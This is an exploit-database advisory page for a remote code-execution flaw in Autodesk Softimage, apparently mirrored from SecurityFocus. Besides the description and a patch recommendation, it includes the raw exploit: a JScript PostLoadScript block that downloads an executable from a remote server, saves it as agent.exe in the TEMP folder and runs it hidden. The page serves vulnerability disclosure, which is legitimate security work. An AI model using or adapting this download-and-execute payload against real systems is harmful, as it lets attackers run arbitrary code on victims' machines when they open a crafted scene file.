header-logo
Suggest Exploit
vendor:
Softimage
by:
SecurityFocus
9.3
CVSS
HIGH
Remote Code-Execution
94
CWE
Product Name: Softimage
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Autodesk Softimage Remote Code-Execution Vulnerability

Autodesk Softimage is prone to a remote code-execution vulnerability. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. The exploit code contains an ActiveXObject to download and execute a malicious file from a remote server.

Mitigation:

Users should apply the patch from the vendor as soon as possible.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36637/info

Autodesk Softimage is prone to a remote code-execution vulnerability.

Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. 

<PostLoadScript>
      <Language>JScript</Language>
      <Function></Function>
      <Script_Content>
    <![cdata[
var s=new ActiveXObject('WScript.Shell');
var o=new ActiveXObject('ADODB.Stream');
var e=s.Environment('Process');
var u='http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
var b=e.Item('TEMP')+'agent.exe';
var x=new ActiveXObject('Microsoft.XMLHTTP');
//x=new ActiveXObject('MSXML2.ServerXMLHTTP');
if(!x)
    exit(0);
x.open('GET',u,0);
x.send(null);
o.Type=1;
o.Mode=3;
o.Open();
o.Write(x.responseBody);
o.SaveToFile(b,2);
s.Run(b,0);
    ]] >
  </Script_Content>
  </PostLoadScript>